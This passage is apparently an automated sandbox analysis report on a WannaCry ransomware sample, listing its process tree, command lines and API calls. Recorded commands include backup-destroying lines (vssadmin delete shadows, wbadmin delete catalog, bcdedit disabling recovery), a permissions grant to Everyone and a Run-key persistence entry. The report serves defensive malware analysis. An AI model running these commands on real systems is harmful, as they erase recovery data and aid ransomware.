May 12, 2017 18:54:37.204504013 CEST | 443 | 49197 | 85.235.250.88 | 192.168.1.16 | CN=www.quob4edbiuwyav4.net | CN=www.377yrgafvm3.com | Sun Mar 19 01:00:00 CET 2017 | Sat Jan 27 01:00:00 CET 2018 | Version: V3; Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5; Key: Sun RSA public key, 1024 bits; public exponent: 65537; SerialNumber: [ efa7449e cb5827a5]

Code Manipulations

System Behavior

General

Start time:18:54:12
Start date:12/05/2017
Path:C:\mssecsvc.exe
Wow64 process (32bit):false
Commandline:'C:\mssecsvc.exe'
Imagebase:0x400000
File size:3723264 bytes
MD5 hash:DB349B97C37D22F5EA1D1841E3C89EB4
Programmed in:C, C++ or other language

General

Start time:18:54:34
Start date:12/05/2017
Path:C:\mssecsvc.exe
Wow64 process (32bit):false
Commandline:C:\mssecsvc.exe -m security
Imagebase:0x400000
File size:3723264 bytes
MD5 hash:DB349B97C37D22F5EA1D1841E3C89EB4
Programmed in:C, C++ or other language

General

Start time:18:54:35
Start date:12/05/2017
Path:C:\Windows\tasksche.exe
Wow64 process (32bit):false
Commandline:C:\WINDOWS\tasksche.exe /i
Imagebase:0x76e20000
File size:3514368 bytes
MD5 hash:84C82835A5D21BBCF75A61706D8AB549
Programmed in:C, C++ or other language

General

Start time:18:54:36
Start date:12/05/2017
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd.exe /c 'C:\ProgramData\ywepvofkuzu108\tasksche.exe'
Imagebase:0x4a1a0000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Programmed in:C, C++ or other language

General

Start time:18:54:36
Start date:12/05/2017
Path:C:\ProgramData\ywepvofkuzu108\tasksche.exe
Wow64 process (32bit):false
Commandline:C:\ProgramData\ywepvofkuzu108\tasksche.exe
Imagebase:0x400000
File size:3514368 bytes
MD5 hash:84C82835A5D21BBCF75A61706D8AB549
Programmed in:C, C++ or other language

General

Start time:18:54:37
Start date:12/05/2017
Path:C:\Windows\System32\attrib.exe
Wow64 process (32bit):false
Commandline:attrib +h .
Imagebase:0x3f0000
File size:16384 bytes
MD5 hash:459A5755AFBB1CB3E67CA4C1296599E3
Programmed in:C, C++ or other language

General

Start time:18:54:37
Start date:12/05/2017
Path:C:\Windows\System32\icacls.exe
Wow64 process (32bit):false
Commandline:icacls . /grant Everyone:F /T /C /Q
Imagebase:0xbf0000
File size:27136 bytes
MD5 hash:1542A92D5C6F7E1E80613F3466C9CE7F
Programmed in:C, C++ or other language

General

Start time:18:54:39
Start date:12/05/2017
Path:C:\ProgramData\ywepvofkuzu108\taskdl.exe
Wow64 process (32bit):false
Commandline:taskdl.exe
Imagebase:0x400000
File size:20480 bytes
MD5 hash:4FEF5E34143E646DBF9907C4374276F5
Programmed in:C, C++ or other language

General

Start time:18:54:39
Start date:12/05/2017
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c 239891494608079.bat
Imagebase:0x4a1a0000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Programmed in:C, C++ or other language

General

Start time:18:54:40
Start date:12/05/2017
Path:C:\Windows\System32\cscript.exe
Wow64 process (32bit):false
Commandline:cscript.exe //nologo m.vbs
Imagebase:0x250000
File size:126976 bytes
MD5 hash:A3A35EE79C64A640152B3113E6E254E2
Programmed in:C, C++ or other language

General

Start time:18:54:54
Start date:12/05/2017
Path:C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Wow64 process (32bit):false
Commandline:@WanaDecryptor@.exe co
Imagebase:0x71d90000
File size:245760 bytes
MD5 hash:7BF2B57F2A205768755C07F238FB32CC
Programmed in:C, C++ or other language

General

Start time:18:54:54
Start date:12/05/2017
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd.exe /c start /b @WanaDecryptor@.exe vs
Imagebase:0x76e20000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Programmed in:C, C++ or other language

General

Start time:18:54:58
Start date:12/05/2017
Path:C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Wow64 process (32bit):false
Commandline:@WanaDecryptor@.exe vs
Imagebase:0x400000
File size:245760 bytes
MD5 hash:7BF2B57F2A205768755C07F238FB32CC
Programmed in:C, C++ or other language

General

Start time:18:55:09
Start date:12/05/2017
Path:C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe
Wow64 process (32bit):false
Commandline:TaskData\Tor\taskhsvc.exe
Imagebase:0x1c0000
File size:3098624 bytes
MD5 hash:FE7EB54691AD6E6AF77F8A9A0B6DE26D
Programmed in:C, C++ or other language

General

Start time:18:55:09
Start date:12/05/2017
Path:C:\ProgramData\ywepvofkuzu108\taskse.exe
Wow64 process (32bit):false
Commandline:taskse.exe C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Imagebase:0x751a0000
File size:20480 bytes
MD5 hash:8495400F199AC77853C53B5A3F278F3E
Programmed in:C, C++ or other language

General

Start time:18:55:09
Start date:12/05/2017
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 'ywepvofkuzu108' /t REG_SZ /d '\'C:\ProgramData\ywepvofkuzu108\tasksche.exe\'' /f
Imagebase:0x4a790000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Programmed in:C, C++ or other language

General

Start time:18:55:09
Start date:12/05/2017
Path:C:\ProgramData\ywepvofkuzu108\taskdl.exe
Wow64 process (32bit):false
Commandline:taskdl.exe
Imagebase:0x400000
File size:20480 bytes
MD5 hash:4FEF5E34143E646DBF9907C4374276F5
Programmed in:C, C++ or other language

General

Start time:18:55:10
Start date:12/05/2017
Path:C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Wow64 process (32bit):false
Commandline:C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Imagebase:0x76e20000
File size:245760 bytes
MD5 hash:7BF2B57F2A205768755C07F238FB32CC
Programmed in:C, C++ or other language

General

Start time:18:55:11
Start date:12/05/2017
Path:C:\Windows\System32\reg.exe
Wow64 process (32bit):false
Commandline:reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 'ywepvofkuzu108' /t REG_SZ /d '\'C:\ProgramData\ywepvofkuzu108\tasksche.exe\'' /f
Imagebase:0x76870000
File size:62464 bytes
MD5 hash:D69A9ABBB0D795F21995C2F48C1EB560
Programmed in:C, C++ or other language

General

Start time:18:55:18
Start date:12/05/2017
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Imagebase:0x4a780000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Programmed in:C, C++ or other language

General

Start time:18:55:24
Start date:12/05/2017
Path:C:\Windows\System32\vssadmin.exe
Wow64 process (32bit):false
Commandline:vssadmin delete shadows /all /quiet
Imagebase:0xd60000
File size:115200 bytes
MD5 hash:6E248A3D528EDE43994457CF417BD665
Programmed in:C, C++ or other language

General

Start time:18:55:35
Start date:12/05/2017
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic shadowcopy delete
Imagebase:0x768d0000
File size:395776 bytes
MD5 hash:A03CF3838775E0801A0894C8BACD2E56
Programmed in:C, C++ or other language

General

Start time:18:55:36
Start date:12/05/2017
Path:C:\Windows\System32\bcdedit.exe
Wow64 process (32bit):false
Commandline:bcdedit /set {default} bootstatuspolicy ignoreallfailures
Imagebase:0x220000
File size:295936 bytes
MD5 hash:ABD373E82F6240031C1E631AA20711C7
Programmed in:C, C++ or other language

General

Start time:18:55:37
Start date:12/05/2017
Path:C:\Windows\System32\bcdedit.exe
Wow64 process (32bit):false
Commandline:bcdedit /set {default} recoveryenabled no
Imagebase:0x5c0000
File size:295936 bytes
MD5 hash:ABD373E82F6240031C1E631AA20711C7
Programmed in:C, C++ or other language

General

Start time:18:55:38
Start date:12/05/2017
Path:C:\Windows\System32\wbadmin.exe
Wow64 process (32bit):false
Commandline:wbadmin delete catalog -quiet
Imagebase:0xf20000
File size:224768 bytes
MD5 hash:EAB630E7E6A7FC248870A2FCDC098B98
Programmed in:C, C++ or other language

General

Start time:18:55:39
Start date:12/05/2017
Path:C:\Windows\System32\wbengine.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\wbengine.exe
Imagebase:0x190000
File size:1203200 bytes
MD5 hash:691E3285E53DCA558E1A84667F13E15A
Programmed in:C, C++ or other language

General

Start time:18:55:41
Start date:12/05/2017
Path:C:\ProgramData\ywepvofkuzu108\taskdl.exe
Wow64 process (32bit):false
Commandline:taskdl.exe
Imagebase:0x400000
File size:20480 bytes
MD5 hash:4FEF5E34143E646DBF9907C4374276F5
Programmed in:C, C++ or other language

General

Start time:18:55:42
Start date:12/05/2017
Path:C:\ProgramData\ywepvofkuzu108\taskse.exe
Wow64 process (32bit):false
Commandline:taskse.exe C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Imagebase:0x400000
File size:20480 bytes
MD5 hash:8495400F199AC77853C53B5A3F278F3E
Programmed in:C, C++ or other language

General

Start time:18:55:43
Start date:12/05/2017
Path:C:\Windows\System32\vdsldr.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\vdsldr.exe -Embedding
Imagebase:0x8b0000
File size:19968 bytes
MD5 hash:A2551668C78CEA4089D71A0A3B36FC0C
Programmed in:C, C++ or other language

Disassembly

Code Analysis

    Execution Graph

    Execution Coverage:30.4%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:62.5%
    Total number of Nodes:40
    Total number of Limit Nodes:1

    Executed Functions

    APIs
    • __set_app_type.MSVCRT ref: 00409A43
    • __p__fmode.MSVCRT ref: 00409A58
    • __p__commode.MSVCRT ref: 00409A66
    • __setusermatherr.MSVCRT ref: 00409A92
      • Part of subcall function 00409B8C: _controlfp.MSVCRT ref: 00409B96
    • _initterm.MSVCRT ref: 00409AA8
    • __getmainargs.MSVCRT ref: 00409ACB
    • _initterm.MSVCRT ref: 00409ADB
    • GetStartupInfoA.KERNEL32(?), ref: 00409B1A
    • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00409B3E
      • Part of subcall function 00408140: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
      • Part of subcall function 00408140: InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
      • Part of subcall function 00408140: InternetCloseHandle.WININET(00000000), ref: 004081A7
      • Part of subcall function 00408140: InternetCloseHandle.WININET(00000000), ref: 004081AB
      • Part of subcall function 00408140: InternetCloseHandle.WININET(00000000), ref: 004081BC
      • Part of subcall function 00408140: InternetCloseHandle.WININET(00000000), ref: 004081BF
    • exit.MSVCRT ref: 00409B4E
    • _XcptFilter.MSVCRT ref: 00409B60
    Memory Dump Source
    • Source File: 00000000.00000002.1609849577.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1609823698.00400000.00000002.sdmp
    • Associated: 00000000.00000002.1609868461.0040A000.00000002.sdmp
    • Associated: 00000000.00000002.1609889626.0040B000.00000008.sdmp
    • Associated: 00000000.00000002.1609917463.00431000.00000004.sdmp
    • Associated: 00000000.00000002.1610304837.00710000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_mssecsvc.jbxd
    APIs
    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
    • InternetCloseHandle.WININET(00000000), ref: 004081A7
    • InternetCloseHandle.WININET(00000000), ref: 004081AB
      • Part of subcall function 00408090: GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
      • Part of subcall function 00408090: __p___argc.MSVCRT ref: 004080A5
      • Part of subcall function 00408090: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
      • Part of subcall function 00408090: OpenServiceA.ADVAPI32(00000000,mssecsvc2.0,000F01FF,77181E70,00000000,?,004081B2), ref: 004080DC
      • Part of subcall function 00408090: CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
      • Part of subcall function 00408090: CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
      • Part of subcall function 00408090: StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126
    • InternetCloseHandle.WININET(00000000), ref: 004081BC
    • InternetCloseHandle.WININET(00000000), ref: 004081BF
    Strings
    • http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com, xrefs: 0040814A

    Non-executed Functions

    APIs
    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,77181E70,?,00000000), ref: 00407CEF
    • GetProcAddress.KERNEL32(00000000,CreateProcessA,?,00000000), ref: 00407D0D
    • GetProcAddress.KERNEL32(00000000,CreateFileA,?,00000000), ref: 00407D1A
    • GetProcAddress.KERNEL32(00000000,WriteFile,?,00000000), ref: 00407D27
    • GetProcAddress.KERNEL32(00000000,CloseHandle,?,00000000), ref: 00407D34
    • FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
    • LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
    • LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
    • SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
    • sprintf.MSVCRT ref: 00407E01
    • sprintf.MSVCRT ref: 00407E18
    • MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00407E2C
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000004,00000000), ref: 00407E43
    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00407E61
    • CloseHandle.KERNEL32(00000000), ref: 00407E68
    • CreateProcessA.KERNEL32 ref: 00407EE8
    • CloseHandle.KERNEL32(00000000), ref: 00407EF7
    • CloseHandle.KERNEL32(08000000), ref: 00407F02
    APIs
    • sprintf.MSVCRT ref: 00407C56
    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
    • CreateServiceA.ADVAPI32(00000000,mssecsvc2.0,Microsoft Security Center (2.0) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,77181E70,00000000), ref: 00407C9B
    • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
    • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
    • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC
    APIs
    • GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
    • __p___argc.MSVCRT ref: 004080A5
    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
    • OpenServiceA.ADVAPI32(00000000,mssecsvc2.0,000F01FF,77181E70,00000000,?,004081B2), ref: 004080DC
    • CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
      • Part of subcall function 00407FA0: ChangeServiceConfig2A.ADVAPI32(?,00000002,00000000), ref: 00407FF4
    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
    • StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1609849577.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1609823698.00400000.00000002.sdmp
    • Associated: 00000000.00000002.1609868461.0040A000.00000002.sdmp
    • Associated: 00000000.00000002.1609889626.0040B000.00000008.sdmp
    • Associated: 00000000.00000002.1609917463.00431000.00000004.sdmp
    • Associated: 00000000.00000002.1610304837.00710000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_mssecsvc.jbxd
    APIs
    • ChangeServiceConfig2A.ADVAPI32(?,00000002,00000000), ref: 00407FF4
    Memory Dump Source
    • Source File: 00000000.00000002.1609849577.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1609823698.00400000.00000002.sdmp
    • Associated: 00000000.00000002.1609868461.0040A000.00000002.sdmp
    • Associated: 00000000.00000002.1609889626.0040B000.00000008.sdmp
    • Associated: 00000000.00000002.1609917463.00431000.00000004.sdmp
    • Associated: 00000000.00000002.1610304837.00710000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_mssecsvc.jbxd

    Execution Graph

    Execution Coverage:4.3%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:2.7%
    Total number of Nodes:638
    Total number of Limit Nodes:6

    Graph


    Executed Functions

    APIs
    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?), ref: 00401CFE
    • OpenServiceA.ADVAPI32(00000000,ywepvofkuzu108,000F01FF,tasksche.exe,00000000), ref: 00401D21
    • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00401D31
    • CloseServiceHandle.ADVAPI32(?), ref: 00401D3A
    • sprintf.MSVCRT ref: 00401D54
    • CreateServiceA.ADVAPI32(?,ywepvofkuzu108,ywepvofkuzu108,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 00401D75
    • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00401D84
    • CloseServiceHandle.ADVAPI32(00000000), ref: 00401D8B
    • CloseServiceHandle.ADVAPI32(?), ref: 00401D9E
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040201F
      • Part of subcall function 00401225: GetComputerNameW.KERNEL32(?,0000018F), ref: 0040125F
      • Part of subcall function 00401225: wcslen.MSVCRT ref: 00401279
      • Part of subcall function 00401225: wcslen.MSVCRT ref: 00401298
      • Part of subcall function 00401225: srand.MSVCRT ref: 004012A1
      • Part of subcall function 00401225: rand.MSVCRT ref: 004012AE
      • Part of subcall function 00401225: rand.MSVCRT ref: 004012C0
      • Part of subcall function 00401225: rand.MSVCRT ref: 004012DD
    • __p___argc.MSVCRT ref: 00402030
    • __p___argv.MSVCRT ref: 00402040
    • strcmp.MSVCRT ref: 0040204B
      • Part of subcall function 00401B5F: MultiByteToWideChar.KERNEL32(00000000,00000000,ywepvofkuzu108,000000FF,?,00000063,?), ref: 00401BCA
      • Part of subcall function 00401B5F: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
      • Part of subcall function 00401B5F: swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
      • Part of subcall function 00401B5F: GetFileAttributesW.KERNEL32(?), ref: 00401C10
      • Part of subcall function 00401B5F: swprintf.MSVCRT(?,%s\Intel,?), ref: 00401C53
      • Part of subcall function 00401B5F: GetTempPathW.KERNEL32(00000104,?), ref: 00401C97
      • Part of subcall function 00401B5F: wcsrchr.MSVCRT ref: 00401CAC
      • Part of subcall function 00401B5F: wcsrchr.MSVCRT ref: 00401CBD
    • CopyFileA.KERNEL32(?,tasksche.exe,00000000), ref: 0040206F
    • GetFileAttributesA.KERNEL32(tasksche.exe,?,00000000), ref: 00402076
      • Part of subcall function 00401F5D: GetFullPathNameA.KERNEL32(tasksche.exe,00000208,?,00000000,?), ref: 00401F97
    • strrchr.MSVCRT ref: 0040209D
    • strrchr.MSVCRT ref: 004020AE
    • SetCurrentDirectoryA.KERNEL32(?,00000000), ref: 004020BB
      • Part of subcall function 004010FD: wcscat.MSVCRT ref: 0040114B
      • Part of subcall function 004010FD: RegCreateKeyW.ADVAPI32(80000001,?,00000000), ref: 0040117A
      • Part of subcall function 004010FD: GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 0040119A
      • Part of subcall function 004010FD: strlen.MSVCRT ref: 004011A7
      • Part of subcall function 004010FD: RegSetValueExA.ADVAPI32(00000000,0040E030,00000000,00000001,?,00000001), ref: 004011BD
      • Part of subcall function 004010FD: RegQueryValueExA.ADVAPI32(00000000,0040E030,00000000,00000000,?,?), ref: 004011E4
      • Part of subcall function 004010FD: SetCurrentDirectoryA.KERNEL32(?), ref: 004011FA
      • Part of subcall function 004010FD: RegCloseKey.ADVAPI32(00000000), ref: 00401203
      • Part of subcall function 00401DAB: FindResourceA.KERNEL32(00000000,0000080A,XIA), ref: 00401DC3
      • Part of subcall function 00401DAB: LoadResource.KERNEL32(00000000,00000000), ref: 00401DD3
      • Part of subcall function 00401DAB: LockResource.KERNEL32(00000000), ref: 00401DDE
      • Part of subcall function 00401DAB: SizeofResource.KERNEL32(00000000,00000000,004020D5), ref: 00401DF1
      • Part of subcall function 00401DAB: strcmp.MSVCRT ref: 00401E5B
      • Part of subcall function 00401DAB: GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00401E6E
      • Part of subcall function 00401E9E: rand.MSVCRT ref: 00401ED0
      • Part of subcall function 00401E9E: strcpy.MSVCRT(?,0040F488), ref: 00401EE7
      • Part of subcall function 00401064: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 004010A8
      • Part of subcall function 00401064: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 004010BD
      • Part of subcall function 00401064: TerminateProcess.KERNEL32(00000000,000000FF), ref: 004010CC
      • Part of subcall function 00401064: GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 004010DD
      • Part of subcall function 00401064: CloseHandle.KERNEL32(00000000), ref: 004010EC
      • Part of subcall function 00401064: CloseHandle.KERNEL32(00000000), ref: 004010F1
      • Part of subcall function 0040170A: LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040172C
      • Part of subcall function 0040170A: GetProcAddress.KERNEL32(00000000,CreateFileW,768DDBAE), ref: 00401749
      • Part of subcall function 0040170A: GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00401756
      • Part of subcall function 0040170A: GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00401763
      • Part of subcall function 0040170A: GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00401770
      • Part of subcall function 0040170A: GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 0040177D
      • Part of subcall function 0040170A: GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 0040178A
      • Part of subcall function 0040170A: GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00401797
      • Part of subcall function 004012FD: __EH_prolog.LIBCMT ref: 00401302
      • Part of subcall function 00401437: GlobalAlloc.KERNEL32(00000000,00100000,00402117,?,768DDBAE,00000000,00402117,00000000,00000000,00000000), ref: 0040146A
      • Part of subcall function 00401437: GlobalAlloc.KERNEL32(00000000,00100000), ref: 00401479
      • Part of subcall function 0040137A: __EH_prolog.LIBCMT ref: 0040137F
      • Part of subcall function 004014A6: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040150D
      • Part of subcall function 004014A6: GetFileSizeEx.KERNEL32(00000000,004081E0), ref: 00401529
      • Part of subcall function 004014A6: memcmp.MSVCRT ref: 00401572
      • Part of subcall function 004014A6: GlobalAlloc.KERNEL32(00000000,?,?,0000000A,00000010,?,768DDBAE,?,0000000A), ref: 0040166D
      • Part of subcall function 004014A6: _local_unwind2.MSVCRT ref: 004016D6
      • Part of subcall function 00402924: _stricmp.MSVCRT(00000000,?,?,768DDBAE,00000000,0000000A,?,00402150,00000000,TaskStart,t.wnry,0000000A,00000000,00000000,00000000), ref: 00402989
      • Part of subcall function 00402924: SetLastError.KERNEL32(0000007F,?,768DDBAE,00000000,0000000A,?,00402150,00000000,TaskStart,t.wnry,0000000A,00000000,00000000,00000000), ref: 004029A7
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1685661268.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.1685653102.00400000.00000002.sdmp
    • Associated: 00000003.00000002.1685669608.00408000.00000002.sdmp
    • Associated: 00000003.00000002.1685678312.0040E000.00000008.sdmp
    • Associated: 00000003.00000002.1685686260.0040F000.00000004.sdmp
    • Associated: 00000003.00000002.1685693121.00410000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_tasksche.jbxd
    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,ywepvofkuzu108,000000FF,?,00000063,?), ref: 00401BCA
    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
    • swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
    • GetFileAttributesW.KERNEL32(?), ref: 00401C10
    • swprintf.MSVCRT(?,%s\Intel,?), ref: 00401C53
      • Part of subcall function 00401AF6: CreateDirectoryW.KERNELBASE(?,00000000,768FE87C,00000104,00000000,?,00401C6B,?,?,?), ref: 00401B07
      • Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNELBASE(?,?,00401C6B,?,?,?), ref: 00401B12
      • Part of subcall function 00401AF6: CreateDirectoryW.KERNELBASE(?,00000000,?,00401C6B,?,?,?), ref: 00401B1E
      • Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNELBASE(?,?,00401C6B,?,?,?), ref: 00401B21
      • Part of subcall function 00401AF6: GetFileAttributesW.KERNEL32(?,?,00401C6B,?,?,?), ref: 00401B2C
      • Part of subcall function 00401AF6: SetFileAttributesW.KERNELBASE(?,00000000,?,00401C6B,?,?,?), ref: 00401B36
      • Part of subcall function 00401AF6: swprintf.MSVCRT(00000000,%s\%s,?,?), ref: 00401B4E
    • GetTempPathW.KERNEL32(00000104,?), ref: 00401C97
    • wcsrchr.MSVCRT ref: 00401CAC
    • wcsrchr.MSVCRT ref: 00401CBD
    APIs
    • __set_app_type.MSVCRT ref: 004077E7
    • __p__fmode.MSVCRT ref: 004077FC
    • __p__commode.MSVCRT ref: 0040780A
    • __setusermatherr.MSVCRT ref: 00407836
      • Part of subcall function 0040792A: _controlfp.MSVCRT ref: 00407934
    • _initterm.MSVCRT ref: 0040784C
    • __getmainargs.MSVCRT ref: 0040786F
    • _initterm.MSVCRT ref: 0040787F
    • GetStartupInfoA.KERNEL32(?), ref: 004078BE
    • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004078E2
      • Part of subcall function 00401FE7: GetModuleFileNameA.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040201F
      • Part of subcall function 00401FE7: __p___argc.MSVCRT ref: 00402030
      • Part of subcall function 00401FE7: __p___argv.MSVCRT ref: 00402040
      • Part of subcall function 00401FE7: strcmp.MSVCRT ref: 0040204B
      • Part of subcall function 00401FE7: CopyFileA.KERNEL32(?,tasksche.exe,00000000), ref: 0040206F
      • Part of subcall function 00401FE7: GetFileAttributesA.KERNEL32(tasksche.exe,?,00000000), ref: 00402076
      • Part of subcall function 00401FE7: strrchr.MSVCRT ref: 0040209D
      • Part of subcall function 00401FE7: strrchr.MSVCRT ref: 004020AE
      • Part of subcall function 00401FE7: SetCurrentDirectoryA.KERNEL32(?,00000000), ref: 004020BB
    • exit.MSVCRT ref: 004078F2
    • _XcptFilter.MSVCRT ref: 00407904
    APIs
    • CreateDirectoryW.KERNELBASE(?,00000000,768FE87C,00000104,00000000,?,00401C6B,?,?,?), ref: 00401B07
    • SetCurrentDirectoryW.KERNELBASE(?,?,00401C6B,?,?,?), ref: 00401B12
    • CreateDirectoryW.KERNELBASE(?,00000000,?,00401C6B,?,?,?), ref: 00401B1E
    • SetCurrentDirectoryW.KERNELBASE(?,?,00401C6B,?,?,?), ref: 00401B21
    • GetFileAttributesW.KERNEL32(?,?,00401C6B,?,?,?), ref: 00401B2C
    • SetFileAttributesW.KERNELBASE(?,00000000,?,00401C6B,?,?,?), ref: 00401B36
    • swprintf.MSVCRT(00000000,%s\%s,?,?), ref: 00401B4E
    APIs
    • GetFullPathNameA.KERNEL32(tasksche.exe,00000208,?,00000000,?), ref: 00401F97
      • Part of subcall function 00401CE8: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?), ref: 00401CFE
      • Part of subcall function 00401CE8: OpenServiceA.ADVAPI32(00000000,ywepvofkuzu108,000F01FF,tasksche.exe,00000000), ref: 00401D21
      • Part of subcall function 00401CE8: StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00401D31
      • Part of subcall function 00401CE8: CloseServiceHandle.ADVAPI32(?), ref: 00401D3A
      • Part of subcall function 00401CE8: sprintf.MSVCRT ref: 00401D54
      • Part of subcall function 00401CE8: CreateServiceA.ADVAPI32(?,ywepvofkuzu108,ywepvofkuzu108,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 00401D75
      • Part of subcall function 00401CE8: StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00401D84
